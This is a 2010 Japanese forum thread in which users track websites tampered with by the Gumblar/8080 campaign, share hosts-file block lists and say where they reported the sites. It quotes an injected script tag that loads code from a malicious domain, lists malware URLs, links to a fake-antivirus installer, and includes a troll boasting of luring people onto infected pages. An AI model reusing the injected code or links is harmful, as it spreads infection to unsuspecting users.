http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2327
■マイクロソフト セキュリティ アドバイザリ (2269637)
http://www.microsoft.com/japan/technet/security/advisory/2269637.mspx
0143コテハン ◆8080adndqg
2010/08/25(水) 18:10:48www●baloghlaszlo●hu/
↓
nuttypiano●com/〜●js
どっとこむ・・
0144コテハン ◆8080adndqg
2010/08/25(水) 20:35:06関東学生アメリカンフットボール連盟公式ホームページ
kcfa●jp/ ←再改竄
>Last-Modified: Wed, 25 Aug 2010 03:26:52 GMT
nuttypiano●com/は、まだ検索に引っ掛からん・・
0145名無しさん@お腹いっぱい。
2010/08/25(水) 22:33:51Gumblar?
0146名無しさん@お腹いっぱい。
2010/08/26(木) 00:38:22ここは鑑定スレではありません
0147名無しさん@お腹いっぱい。
2010/08/26(木) 00:38:45祝!\(^o^)/再改竄
0148名無しさん@お腹いっぱい。
2010/08/26(木) 14:45:29niftyにつーほー
前回もniftyにつーほーして受領されたんだけどねぇ。。。
0149コテハン ◆8080adndqg
2010/08/27(金) 14:32:43www16●atpages●jp/akimonomm/businessstory/
www●curry-ousama●co●jp/i/ ※電話用
0150名無しさん@お腹いっぱい。
2010/08/27(金) 19:40:36仮想PCが重くなった よってGumblar確定
0151コテハン ◆8080adndqg
2010/08/27(金) 20:05:47「禿.js」装填中のweb屋
・ホームページ開発,受託,請負,Web開発,システム開発【フィールドシステム】
www●fieldsystem●ne●jp/blog/entvw_0000000001●aspx
↓
<meta name="description" CONTENT="フィールドシステムからのお知らせです。<script src=http://www●wangqiao365●com/img/yahoo●js></script>">
www.google.com/safebrowsing/diagnostic?site=www●fieldsystem●ne●jp/&hl=ja
廃業しろよwwww
0152名無しさん@お腹いっぱい。
2010/08/27(金) 20:30:14同意w
0153名無しさん@お腹いっぱい。
2010/08/27(金) 21:23:47これはw
0154名無しさん@お腹いっぱい。
2010/08/27(金) 23:40:37乙乙
>>149
上:@PAGESにつーほー。
下:削除されたみたい。
>>151
So-netにつーほー。
0155名無しさん@お腹いっぱい。
2010/08/28(土) 01:49:58\(^o^)/オワタ
0156名無しさん@お腹いっぱい。
2010/08/28(土) 18:45:05@housoukomachi
@gyudon_sukiya
@meiji_fan
ついったーにつーほーしたら面白い事になるかもしれんw
※日本のザルな法律じゃなくて、アメリカンな法律で裁かれる
0157名無しさん@お腹いっぱい。
2010/08/30(月) 09:13:390.0.0.0 cc●wzxyq●com
って感じでゴリゴリと
C:\Windows\System32\drivers\etcフォルダ内のhostsファイルね
0158名無しさん@お腹いっぱい。
2010/08/30(月) 09:28:270159名無しさん@お腹いっぱい。
2010/08/30(月) 09:55:450.0.0.0 rctank●jp
0.0.0.0 wzxyq●com
0.0.0.0 cc●wzxyq●com
0.0.0.0 googleads●g●doubleclick●net
0.0.0.0 g●doubleclick●net
0.0.0.0 doubleclick●net
0.0.0.0 nuttypiano●com
0.0.0.0 riotassistance●ru
0.0.0.0 roseplaceseniorassistedliving●com
0.0.0.0 jsunpack●jeek●org
0.0.0.0 jeek●org
0.0.0.0 parkperson●ru
0.0.0.0 www●parkperson●ru
0.0.0.0 pantscow●ru
0.0.0.0 www●pantscow●ru
0.0.0.0 60●42●255●33
0.0.0.0 118●21●192●131
0.0.0.0 118●21●197●41
0.0.0.0 218●43●251●37
0.0.0.0 210●190●162●5
0.0.0.0 118●23●168●15
0.0.0.0 122●1●246●94
0.0.0.0 221●184●27●254
0.0.0.0 163●139●130●150
0.0.0.0 163●139●124●135
0.0.0.0 203●152●213●250
0.0.0.0 www14●atpages●jp
0.0.0.0 www●wangqiao365●com
0.0.0.0 wangqiao365●com
こんな感じで書いておけば気休めにはなるかもしれない
0160名無しさん@お腹いっぱい。
2010/08/30(月) 10:19:300161名無しさん@お腹いっぱい。
2010/08/30(月) 11:20:43sumori●jp
0162名無しさん@お腹いっぱい。
2010/08/30(月) 11:25:29これだな
0163名無しさん@お腹いっぱい。
2010/08/30(月) 12:57:49電凸完了
0164163
2010/08/30(月) 14:30:28index.phpのコードは光速で消えたけど
jsの中に残ってるコードはどうすんのよ?(苦笑)
電話だけではわからないみたいだから
問い合わせフォームから再凸
■IPA(情報処理推進機構)
ttp://www.ipa.go.jp/
▼(3)ウェブサイト改ざんの被害発生時の対処
ttp://www.ipa.go.jp/security/txt/2010/04outline.html
■インシデント報告の届出(JPCERT/CC)
ttps://www.jpcert.or.jp/form/
■so-netセキュリティ通信
ttp://www.so-net.ne.jp/security/index.html
▼「ガンブラー」「サイト改ざん」めぐる基本のQ&A
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
▼サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
ttp://www.so-net.ne.jp/security/news/library/2166.html
これだけ添付しておけばきっとわかってくれr(ry
0165名無しさん@お腹いっぱい。
2010/08/30(月) 14:53:11WHOISからめるぽ。
さくらにもつーほーすたお。
0166名無しさん@お腹いっぱい。
2010/08/30(月) 18:34:37ttp://slashdot.jp/~LARTH/journal/514123
岡山はんこ広場
www.hanko-okayama●jp
→nuttypiano●com/E-mail.js (いつもの)
こんなページが設置されていたり。
www.hanko-okayama●jp/where34.html
→www.drugsad●com (薬屋さん)
→nakulan.co●in/_vti_script/h-clearance.php (いつもの)
0167名無しさん@お腹いっぱい。
2010/08/30(月) 19:24:05〜34.htmlにGumblarっぽいのが寄生してるなw
幸い削除できたから一安心出来ない
0169名無しさん@お腹いっぱい。
2010/08/31(火) 11:48:130171名無しさん@お腹いっぱい。
2010/08/31(火) 16:00:26www●keiolax●com
0172名無しさん@お腹いっぱい。
2010/08/31(火) 17:44:48h ttp://うちのサイト/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=
↑が存在しないディレクトリに直接やって来ていた
tiny_mce改竄系か
0173名無しさん@お腹いっぱい。
2010/08/31(火) 17:46:03やっぱそうだった
0174名無しさん@お腹いっぱい。
2010/09/01(水) 05:52:380175名無しさん@お腹いっぱい。
2010/09/01(水) 18:49:15無害とは言え、今現在もコードが残ったままとは・・
フィールドシステム完璧にオワタww
0176名無しさん@お腹いっぱい。
2010/09/03(金) 11:00:30file●asobube●com/sansyoku/index●html
マグロと一緒にウィルスも食わされるとは…!
0178名無しさん@お腹いっぱい。
2010/09/03(金) 16:15:54Trojan:JS/Redirector.DC検出
0179名無しさん@お腹いっぱい。
2010/09/03(金) 18:57:040180名無しさん@お腹いっぱい。
2010/09/03(金) 19:01:14/google●com/mininova●org/youdao●com●phpになるな
0181名無しさん@お腹いっぱい。
2010/09/03(金) 19:50:21ttp://sucuri.net/malware/entry/MW:SIPRO:1
注:玄人向け
参照
MW:JS:151
MW:JS:152
0182名無しさん@お腹いっぱい。
2010/09/03(金) 20:51:39"Trojan:JS/Redirector.DC"という事はMSEか やばいね
0183名無しさん@お腹いっぱい。
2010/09/03(金) 21:16:300184名無しさん@お腹いっぱい。
2010/09/04(土) 00:52:160185名無しさん@お腹いっぱい。
2010/09/04(土) 19:10:170186名無しさん@お腹いっぱい。
2010/09/04(土) 22:14:140187名無しさん@お腹いっぱい。
2010/09/05(日) 00:21:35どなたかplz
0188名無しさん@お腹いっぱい。
2010/09/05(日) 00:44:25ttp://web.archive.org/web/20070117074533/http://cdn.downloadcontrol.com/files/installers/SystemDoctor2006FreeInstall_jp.exe
自己責任でな 元々サイトが死んでるから実行出来るかはシラネ
0189名無しさん@お腹いっぱい。
2010/09/05(日) 16:11:50偽アンチウイルスソフトでダウンロードできるとこって何かないですか?
0190名無しさん@お腹いっぱい。
2010/09/05(日) 16:20:02これでやってみたらどうだ
0191名無しさん@お腹いっぱい。
2010/09/05(日) 16:40:14これでアンチウイルスの性能評価できる。
0192名無しさん@お腹いっぱい。
2010/09/05(日) 23:27:13それとも情報盗まれる?
0193名無しさん@お腹いっぱい。
2010/09/05(日) 23:37:45試してみるのオヌヌメ
0194名無しさん@お腹いっぱい。
2010/09/06(月) 00:04:39試せたらここで聞いてないわw
0195名無しさん@お腹いっぱい。
2010/09/06(月) 10:46:28「PCすてれば」とか「ためせば」とか「javaきればおkおk」とか
相手にガブガブする奴も多いし
0196コテハン ◆8080adndqg
2010/09/06(月) 14:08:00ueno-syoten●com/
>>195
荒れるのは「仕様」なので我慢して下さい
0197名無しさん@お腹いっぱい。
2010/09/06(月) 22:38:03www16●ocn●ne●jp/~moyogi/
www31●ocn●ne●jp/~jbc/
www4●ocn●ne●jp/~minorisk/
www8●ocn●ne●jp/~iyashiro/
www18●ocn●ne●jp/~serec/ <Gumblar.X>
0198名無しさん@お腹いっぱい。
2010/09/07(火) 20:45:08感染後の流れはここの「第3段階」のところ
今でも変わってないと思う
blog.trendmicro.co.jp/archives/3340
冗談ではなく、何が行なわれるかは実際に感染しないと分からん
PCが乗っ取られるので、攻撃者のやりたい放題状態になる
0199名無しさん@お腹いっぱい。
2010/09/07(火) 22:04:08なるほど、情報サンクス
0200コテハン ◆8080adndqg
2010/09/07(火) 22:50:098080(旧型)
www●kireibast●sakura●ne●jp/〜
↓
ttp://search.yahoo.co.jp/search?p=site%3Awww●kireibast●sakura●ne●jp&aq=-1&oq=&ei=UTF-8&fr=sfp_as&x=wrt
>約2,310件
たぶんGumblar.x
sugimotokairo●net/index●h
その他(下段は改竄祭り絶賛開催中)
www6●atpages●jp/ryumazin
istanbulyelken●com/iyk/templates_c/index1●html
0201名無しさん@お腹いっぱい。
2010/09/09(木) 08:10:550202コテハン ◆8080adndqg
2010/09/09(木) 17:16:41www●mspinjapan●com/
0203コテハン ◆8080adndqg
2010/09/09(木) 17:49:14www●foresto-ne●com/
0204名無しさん@お腹いっぱい。
2010/09/09(木) 18:01:17ttp://internet.watch.impress.co.jp/docs/news/20100909_392583.html
0205(VдV) ◆yUyb3Tqn92
2010/09/09(木) 20:12:33(VдV)いい加減俺様みたいなのが悪用するのわかって貼ってるだろ
0206名無しさん@お腹いっぱい。
2010/09/09(木) 20:25:440207(VдV) ◆yUyb3Tqn92
2010/09/09(木) 20:50:23こういう反応を高みの見物するの好き(VдV)v イェィ
0208名無しさん@お腹いっぱい。
2010/09/09(木) 20:53:12早く悪用してみろよ糞ガキ
0209名無しさん@お腹いっぱい。
2010/09/09(木) 21:03:41意 味:物事の成り行きを、第三者として傍観すること。
0210コテハン ◆8080adndqg
2010/09/09(木) 21:38:5733323335333433353333333733323335333333393334333633323335333433313333333533323335
33343335333333373332333533333339333433313332333533333338333333343332333533343335
33333339333233353333333933343331333233353333333933343333333233353334333533333335
33323335333433313334333533323335333433323333333333323335333433353333333833323335
33333338333333303332333533333338333333353332333533343335333333343332333533343332
33333339333233353333333933333339
0211名無しさん@お腹いっぱい。
2010/09/09(木) 22:21:32ruhuraro●blog57●fc2●com/
0212名無しさん@お腹いっぱい。
2010/09/09(木) 22:42:210213名無しさん@お腹いっぱい。
2010/09/09(木) 22:44:0533333335333633313333333733333339333333373333333733333333333333353333333633333331
33333335333333333333333533333337333333333333333433333333333333343333333433333337
33333337333333353333333333333335333333373333333233333335333333333333333333333337
33333333333333353333333533333339333333373333333533333335333333363333333333333335
33333333333333363333333633333331333333343333333233333333333333353333333733333331
3333333333333332333333363333333930643061
0214名無しさん@お腹いっぱい。
2010/09/09(木) 23:17:01馬鹿?
0215名無しさん@お腹いっぱい。
2010/09/10(金) 00:51:01> 16287 個のドメインを感染させています
www.google.com/safebrowsing/diagnostic?site=nuttypiano.com&hl=ja
だいぶ大きいけど、去年の初代Gumblar(GENO)はピーク時6万
googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html
0216名無しさん@お腹いっぱい。
2010/09/10(金) 00:59:060217名無しさん@お腹いっぱい。
2010/09/10(金) 13:26:37胸が熱くなるな…
0218名無しさん@お腹いっぱい。
2010/09/10(金) 16:17:26マジキチだから仕方がないw
0220(VдV) ◆yUyb3Tqn92
2010/09/11(土) 00:29:46でも俺様にムカついちゃった奴の自演なのだろう
他の書き込みを自演と決め付けている被害妄想をしてるのがなによりの証拠だぜ
自演大好きな奴にありがちな被害妄想乙(>w<)お見通し!
(VдV)でもそんなに悔しかったら俺様のようにコテつけて堂々と書き込めばいいのにね
0221(VдV) ◆yUyb3Tqn92
2010/09/11(土) 00:32:05中には俺様が踏ませたことによって感染につながった連中もいるのだろうな
(*VдV*)でも俺様ぴんぴんしてるおw
踏ませるだけなら加害者でも被害者でもない
なので第三者同然(>w<)メシウマ爽快学会!
0222(VдV) ◆yUyb3Tqn92
2010/09/11(土) 00:35:35先に立ったあのスレで>>1のスレ番ミスを厳しく指摘した上に死ねとまで言った効果は抜群だったか
0223名無しさん@お腹いっぱい。
2010/09/11(土) 00:43:22お前が勝ちなのは当然だろ
街中歩いてて通り魔に刺されるなんて思ってる奴いないんだから
お前に突然危険URL踏まされる奴らだって同じこと
0224(VдV) ◆yUyb3Tqn92
2010/09/11(土) 01:11:03ウィルスURL踏むのは踏む奴の意思で踏んでるわけだからな
(VдV)俺様はそいつが踏むように心理誘導してるだけ
ネットやってて自分がウィルスかからないと思ってURL開いてる奴がいるとしたらそいつは低脳以外何者でもねーぜ
そういう意味じゃ俺様がやってることは確かに正義と言っても過言ではないかもな。必要悪という名の正義があっても良いと思うんだ(w)
0225名無しさん@お腹いっぱい。
2010/09/11(土) 01:16:16ちなみにアンチウイルスソフトは何を使ってるの?
やっぱ情弱御用達のavast!かなw
0226(VдV) ◆yUyb3Tqn92
2010/09/11(土) 02:10:39おいおい(>w<)
てことはお前アンチウィルスソフトに頼ってるのか?(>w<)プクーススススwwwww
お前みたいにどんなソフトを入れてればいいかどうかって考えてる時点で不合格。
情弱乙(>w<)レベル低っ!
( VдV )やっぱ俺様って論破の天才だね
0227(VдV) ◆yUyb3Tqn92
2010/09/11(土) 02:13:150228名無しさん@お腹いっぱい。
2010/09/11(土) 02:15:570229名無しさん@お腹いっぱい。
2010/09/11(土) 02:18:480230(VдV) ◆yUyb3Tqn92
2010/09/11(土) 02:20:030231(VдV) ◆yUyb3Tqn92
2010/09/11(土) 02:21:23お や す み
0232(VдV) ◆yUyb3Tqn92
2010/09/11(土) 02:22:220233名無しさん@お腹いっぱい。
2010/09/11(土) 02:27:00そうやって頭にきた素振り見せると余計顔文字喜ばせるだけだぞ
それに>>225-226は確かにお前より顔文字の方が正論だから仕方ない
0234名無しさん@お腹いっぱい。
2010/09/11(土) 02:28:48おれはお前好きだ
このスレ頭固い奴ばかりだから
またきてくれ、おやすみ
0235名無しさん@お腹いっぱい。
2010/09/11(土) 02:31:00低脳だからこれくらいが限界か
0236↑
2010/09/11(土) 03:02:28そんなに必死になるならIDあるスレいけよ低脳wwwww
0237名無しさん@お腹いっぱい。
2010/09/11(土) 03:03:370238名無しさん@お腹いっぱい。
2010/09/11(土) 07:50:35FF14スレにも出没してたでしょ
FF14ゲーム内のgumblarってもしかしてあなた?
0239名無しさん@お腹いっぱい。
2010/09/11(土) 08:01:53エスパー養成講座みたいだ
0240名無しさん@お腹いっぱい。
2010/09/11(土) 11:06:56意 味:愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。
顔文字のためにあるような諺(ことわざ)だなw
0241名無しさん@お腹いっぱい。
2010/09/11(土) 11:07:180242名無しさん@お腹いっぱい。
2010/09/11(土) 11:10:38『馬鹿の一つ覚え』
意 味:愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。
顔文字のためにあるような諺(ことわざ)だなw
241 :名無しさん@お腹いっぱい。:2010/09/11(土) 11:07:18
なぜセキュ板は自分の考えと違う者に排他的な人が多いのか
顔文字にコケにされて悔しいのはわかるが
自演下手すぎ^^;せめて一分以上は時間あけようぜ
あw残念ながら俺はお前が戦ってる顔文字じゃないからね!悪いが^^
0243名無しさん@お腹いっぱい。
2010/09/11(土) 13:36:140245名無しさん@お腹いっぱい。
2010/09/11(土) 17:05:46自分のサイトの別館があるgeocitiesのファイルマネージャを1年ぶりくらいに開いたら
スクリプトタグが大量に書き込まれていて広告ページが勝手に作られていた
これはもうだめかね
0246名無しさん@お腹いっぱい。
2010/09/11(土) 19:16:04おまえわおれか。
10月に追い出されるよー、めんどくさいよー。
0247名無しさん@お腹いっぱい。
2010/09/12(日) 12:43:090248名無しさん@お腹いっぱい。
2010/09/12(日) 18:07:33ttp://www.mywot.com/en/forum/7508--canadian-pharmacy-domains?comment-43426
.ru 多すぎだろw
0249名無しさん@お腹いっぱい。
2010/09/12(日) 18:27:010250名無しさん@お腹いっぱい。
2010/09/12(日) 18:58:500251名無しさん@お腹いっぱい。
2010/09/12(日) 19:10:260252名無しさん@お腹いっぱい。
2010/09/12(日) 19:41:29WOT入れろよ
0253名無しさん@お腹いっぱい。
2010/09/13(月) 13:59:18scarystroke●ru/●●●●.js
0254名無しさん@お腹いっぱい。
2010/09/13(月) 23:21:16まあ「自分だけが本質を解っている」妄想がここまで強いともう矯正不可能だろうね
0255名無しさん@お腹いっぱい。
2010/09/14(火) 00:53:32ttp://www.sumori.jp/news/index.php?e=81
McAfee SiteAdvisor
ttp://siteadvisor.jp/sites/sumori.jp/postid?p=5162331
改竄されてたことを正直に書かないのに「正直な家造り」ですか・・
0256名無しさん@お腹いっぱい。
2010/09/14(火) 01:15:32日本に「報復」!中国ハッカー組織が攻撃宣言
http://www.sanspo.com/shakai/news/100913/sha1009132256024-n1.htm
攻撃増えるらしい
0257名無しさん@お腹いっぱい。
2010/09/14(火) 23:51:41ttp://japan.cnet.com/sp/zeroday/story/0,3800105600,20419956,00.htm
またおまえ(Adobe)か!
0258名無しさん@お腹いっぱい。
2010/09/14(火) 23:57:120259名無しさん@お腹いっぱい。
2010/09/15(水) 09:50:30ニコニコも一時閉鎖するくらいしないとダメじゃねえか?
0260名無しさん@お腹いっぱい。
2010/09/15(水) 16:23:550261名無しさん@お腹いっぱい。
2010/09/16(木) 00:15:41それだと脆弱性放置になってしまうから
社員全員24時間勤務(休憩無し・メシ抜き)で最速対応のほうが…
今後ゼロデイが発覚したら社員全員尻叩き1万発
※重役の尻叩きの様子はようつべで公開
0262名無しさん@お腹いっぱい。
2010/09/16(木) 07:31:100263名無しさん@お腹いっぱい。
2010/09/16(木) 07:39:42それとも動画サイト以外もこのゼロデイの対象なのかな
0264名無しさん@お腹いっぱい。
2010/09/16(木) 07:52:25Flash全てだよ
0265名無しさん@お腹いっぱい。
2010/09/16(木) 09:06:07こっちで先に読みこんじゃってるからなぁ
0267名無しさん@お腹いっぱい。
2010/09/16(木) 13:52:17俺はFirefox+Stop Autoplayに避難した
0268名無しさん@お腹いっぱい。
2010/09/16(木) 14:11:01ttp://www.youtube.com/html5
で有効にすりゃFlash使わんで済むな
0269名無しさん@お腹いっぱい。
2010/09/16(木) 18:11:20いつも見てるページは問題ないみたいだからこのまま行こうかな。
0270名無しさん@お腹いっぱい。
2010/09/17(金) 12:37:300271名無しさん@お腹いっぱい。
2010/09/17(金) 13:28:39グナッシュ重くね?動画だけでなく普通のFlashもクソ重いんだけど
ただアドベのタダメシ喰らい共には二度と世話に
なりたくない点では迷いなく同意だが
0272名無しさん@お腹いっぱい。
2010/09/19(日) 16:20:16http://www.adobe.com/support/security/advisories/apsa10-03.html
Adobe Flash Playerは米国時間9月20日にリリース
Google Chrome内蔵Flashは10.1.85.3に本日更新済み
0273名無しさん@お腹いっぱい。
2010/09/19(日) 18:35:010274名無しさん@お腹いっぱい。
2010/09/20(月) 18:08:25まあいいけど
0275名無しさん@お腹いっぱい。
2010/09/20(月) 18:16:250276名無しさん@お腹いっぱい。
2010/09/20(月) 20:09:550277名無しさん@お腹いっぱい。
2010/09/21(火) 04:03:400278名無しさん@お腹いっぱい。
2010/09/21(火) 07:14:160279名無しさん@お腹いっぱい。
2010/09/21(火) 09:38:470280名無しさん@お腹いっぱい。
2010/09/21(火) 11:17:30>>205の影響で最近URL貼るの自重してるんだな
新しいの見つけたので貼ろうと思ったが自重しとく
0281名無しさん@お腹いっぱい。
2010/09/21(火) 11:29:060282名無しさん@お腹いっぱい。
2010/09/21(火) 13:15:34これだけ騒がれて未だにアップデートもしないずさんな奴は
自重しても別のウィルスに感染するだろ。
0283名無しさん@お腹いっぱい。
2010/09/21(火) 13:18:10というか1匹のアホのせいで情報の提供・共有に臆するようになったら本末転倒じゃね。
0284名無しさん@お腹いっぱい。
2010/09/21(火) 16:09:588080が一時撤退していたからな
現在、放置サイトを中心に新ドメインで再起動中
44Gr44GC44GG44G144GP44Gp44Gj44Go44GT44KA
ここみればわかるんじゃね?
0285名無しさん@お腹いっぱい。
2010/09/21(火) 20:48:35不定期で観測してるけど
また、動きあったん?
てか、今見たら飛び先の飛び先がまた変わってた。。。おrz。。。。
よく見たら別のXの蜜壷化してるとこの飛び先になってた。
つーことは8080じゃなくてXだったんか>>284
0286名無しさん@お腹いっぱい。
2010/09/21(火) 20:58:36ホスト勘違いすた。
>>285は忘れてちょ。m(_ _)m
0287名無しさん@お腹いっぱい。
2010/09/21(火) 22:07:24下段のphp
・jsunpack
09d45fc74d80a65f539b612e6a90739abfe61186
0288名無しさん@お腹いっぱい。
2010/09/21(火) 23:16:59ノ
あらら、中身かわっちゃたのねぇ。。。
自分が投げた時の
fc588961ef3119b8dc764166e8454389983601ff
昨日検体送った分で、>>287の飛び先もあったからどーすべ。
0289名無しさん@お腹いっぱい。
2010/09/21(火) 23:48:52とりあえず送ったお。
jsunpack使わせていただきました。m(_ _)m
(何度もアクセスさせるとjsunpackも拒否られるようなので。)
0290名無しさん@お腹いっぱい。
2010/09/21(火) 23:55:36フラッシュプレイヤー、更新したほうが良い?
0291名無しさん@お腹いっぱい。
2010/09/22(水) 00:04:050292名無しさん@お腹いっぱい。
2010/09/22(水) 01:00:36そのまま阿呆に死ね
0293名無しさん@お腹いっぱい。
2010/09/22(水) 01:22:29初心者はうせろ
0294↑
2010/09/22(水) 02:36:22あるいは死ね
0295名無しさん@お腹いっぱい。
2010/09/22(水) 12:07:470296↑
2010/09/22(水) 13:02:270297名無しさん@お腹いっぱい。
2010/09/22(水) 16:12:54www●okestyles●com/mainframe●asp?c=1 (〜529あたりまで延々と...)
※改竄を放置したまま下記サイトに逃亡
www●okestyleszakka●com
アクセス注意
en-trance●co●jp
※>>130参照
完璧にオワタwwwwwww
0298名無しさん@お腹いっぱい。
2010/09/22(水) 19:38:06おちゅ。
JPCERT/CCにもめるぽすた。
0299名無しさん@お腹いっぱい。
2010/09/23(木) 23:44:50またコードが変わったなw
0300名無しさん@お腹いっぱい。
2010/09/24(金) 04:33:31今度は伊太利亜語れすか。。。
aHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZV90P3RleHQ9YXVtZW50YXJlJTIw
Y29tZSUyMGwlMjBlcmV6aW9uZSUyMHRoZSUyMG9mJTIwZmFybWFjbyUyMHpvbG9mdCUyMHR3byUy
MHJlbWFpbnMlMjBjaGVhcCUyMGdlbmVyaWNzJTIwc2l0ZXMlMjBzaXRlcyUyMHRvJTIwYW5kJTIw
aW1wb3RlbnphJTIwc2ludG9taSUyMHByZXNjcmlwdGlvbiUyMHBvc29sb2dpYSUyMHBsYW5uaW5n
JTIweGFuYXglMjBhbGxlcmdpYSUyMHBwZCUyMHRoZSUyMGElMjBhY2NvdW50JTIwb2YlMjBhZGRz
JTJDJTIwdGhlJTIwYmUlMjBjbGElMjBtZWdhJTIwZXhhbWluaW5nJTIwYW5kJTIwc2VyaW91cyUy
MGFyZSUyMHNjaWVudGlzdHMlMjBpdCUyMGZyaWVuZHMlMkUlMjBtZXJjZWRlcyUyMGNsYSUyMDI5
JTIwc2FmZXR5JTIwcHJhY3RpdGlvbmVycyUyMGludGVyYWN0aW9ucyUyMG1vZHVyZXRpYyUyMHBl
ciUyMGRpbWFncmlyZSUyMHNpdGVzJTIwZGklMjBwZXIlMjBzbWV0dGVyZSUyMGZ1bWFyZSUyMGxp
YnJvJTIwb2ZmZXJlZCUyMGElMjBpbCUyMHVuaXZlcnNpdHklMjBhbiUyMGxldHRlcnMlMjB0byUy
MGlzJTIwc3BvcnQlMjBncmF2aWRhbnphJTIwYXZlcmFnZSUyMGElMjBQcm90ZWN0aW9uJTJFJTIw
YXJ0cml0ZSUyMGFjdXRhJTIwSW4lMjBubyUyMHdpdGglMjBhbmQlMjBuZWVkJTIwcGlhbmNhdmFs
bG8lMjBkaW1hZ3JpbWVudG8lMjBzdGF0ZSUyMGNlbnRybyUyMGtpbmQlMjBtaWNhcmRpcyUyMGJv
ZWhyaW5nZXIlMjBhbmQlMjB3aG9sZSUyMGFsaSUyMGxlJTIwYXByaSUyMGNvbXBhbnklMjB0aGF0
JTIwc291cmNlcyUyMGlzJTIwdGhlJTIwdGhlJTIwZGlhYmV0ZSUyMGludGVybmV0JTIwdG8lMjBw
cmV2ZW56aW9uZSUyMEluYyUyRSUyQyUyMGluY2x1ZGluZyUyMHA1MyUyMGUlMjBjYW5jcm8lMjBw
cm92aWRlJTIwc29jaWFsJTIwZW50cmVwcmVuZXVyJTIwYXdhcmQlMjBwcmVzY3JpcHRpb24lMjBk
YW5nZXIlMjBpbnZvbHZlZCUyMHBhcnQlMjBkaWFiZXRlJTIwYXR0aXZpdGElMjBmaXNpY2ElMjBh
Ym91dCUyMGlzJTIwc3RheSUyMHNlZ25vJTIwc2NvcnBpb25lJTIwZW5zdXJlJTIwc3VjaCUyMGFs
bGVyZ2lhJTIwYWdsaW8lMjBwb3dlcnMlMjBmZXclMjBvZiUyMGFuZCUyMHBhc3QlMjBjYXB0b3By
aWwlMjBlbmFsYXByaWwlMjBleWUlMjBzYXlzJTIwdGVybWlub2xvZ3klMjBGVENzJTIwYSUyMElu
JTIwZm9iaWElMjBzb2NpYWxlJTIwdGhlJTIwbmFtZSUyMGNvbmNlcm5zJTJDJmxhbmdwYWlyPWl0
fGphJmhsPWphJmllPVVURjgj
0301名無しさん@お腹いっぱい。
2010/09/24(金) 04:41:41英語だとgdgdになっちゃう。
0302名無しさん@お腹いっぱい。
2010/09/24(金) 07:48:59これもガンブラーなんだ
0303名無しさん@お腹いっぱい。
2010/09/25(土) 07:08:29ttp://slashdot.jp/slash/10/09/24/1641224.shtml
こんな事になってるらしい
http://yuzuru.2ch.net/test/read.cgi/news4vip/1285344748/
http://hibari.2ch.net/test/read.cgi/sec/1283256398/630-633
0304名無しさん@お腹いっぱい。
2010/09/25(土) 10:04:100305名無しさん@お腹いっぱい。
2010/09/25(土) 13:34:19よくわかってない人が書いてるsecurity toolの削除方法では
8080の本体(高機能ダウンローダー)のほうを潰してないので、
セキュリティ的には何もしてないのと同じです(まともに動くようにしただけ)
8080の本体を潰さない不完全な削除はらネットに繋いでるだけで他人に迷惑をかけている(可能性が非常に高い)ので、
必要なデータをバックアップした後にリカバリ(クリーンインストール)を行って下さい。
※複数のセキュリティソフトで膨大な時間を費やして不完全な削除(HDDをゴリゴリ鳴かせて寿命を縮める)より、
リカバリ一発のほうが遥かに早くて確実です。
0306名無しさん@お腹いっぱい。
2010/09/25(土) 14:13:061000円払えば教えてくれるらしいよ
ttp://8.pro.tok2.com/~miyuki-net-school/
0307名無しさん@お腹いっぱい。
2010/09/25(土) 14:53:290308名無しさん@お腹いっぱい。
2010/09/25(土) 15:08:030309名無しさん@お腹いっぱい。
2010/09/25(土) 15:15:48Webシールド機能無しのセキュリティソフトも微妙
0310307
2010/09/25(土) 15:27:120311名無しさん@お腹いっぱい。
2010/09/25(土) 15:55:48YouTube - 「衝撃!!ウイルス感染のその瞬間 前編」
http://www.youtube.com/watch?v=ijb-fNMA8Aw&feature=related
0312307
2010/09/25(土) 16:02:010313名無しさん@お腹いっぱい。
2010/09/25(土) 16:30:44発言がいちいち恥ずかしいから黙ってみてろ
0314名無しさん@お腹いっぱい。
2010/09/25(土) 19:18:31あのくそじじい・・・まだ懲りてないのかwww
0315名無しさん@お腹いっぱい。
2010/09/25(土) 23:01:24ttp://mainichi.jp/select/biz/it/news/20100925k0000e040051000c.html
0316名無しさん@お腹いっぱい。
2010/09/26(日) 00:21:300317名無しさん@お腹いっぱい。
2010/09/26(日) 02:22:23ヒント:自動再生
0318名無しさん@お腹いっぱい。
2010/09/26(日) 02:47:420319名無しさん@お腹いっぱい。
2010/09/26(日) 03:17:03自動再生ってリムーバブルディスク挿した時とかのアレ?
0320名無しさん@お腹いっぱい。
2010/09/26(日) 05:10:150321名無しさん@お腹いっぱい。
2010/09/26(日) 17:30:120322名無しさん@お腹いっぱい。
2010/09/26(日) 23:34:090323名無しさん@お腹いっぱい。
2010/09/27(月) 03:02:38船長の件で「あんな事(保障しろとか、無茶苦茶な要求まで)」言われてるんだから
日本もスーパーハカーにやられたサイトの復旧費用を請求すべき
200兆円くらい()笑
0324名無しさん@お腹いっぱい。
2010/09/27(月) 07:57:36http://kamome.2ch.net/test/read.cgi/news/1285541363/
0325名無しさん@お腹いっぱい。
2010/09/27(月) 09:24:13ttp://gumblar8080taisaku.com/
またECスタジオのEset宣伝サイト
0326名無しさん@お腹いっぱい。
2010/09/27(月) 17:00:050327名無しさん@お腹いっぱい。
2010/09/27(月) 17:20:35>圧倒的に強いセキュリティソフトはESET Smart Securityです
ワロタwwww
0328名無しさん@お腹いっぱい。
2010/09/27(月) 22:45:12ほんと殺してやりてぇ
0329名無しさん@お腹いっぱい。
2010/09/27(月) 23:19:58いい加減に捕まえてほしいねぇ・・・
ただ、実際に捕まるのは。三流制作者の原田ウイルスやKenzeroぐらいだよなぁ・・・
あれはアホすぎ。
0330名無しさん@お腹いっぱい。
2010/09/27(月) 23:23:20そもそもあれはウイルスじゃないよな。
0331名無しさん@お腹いっぱい。
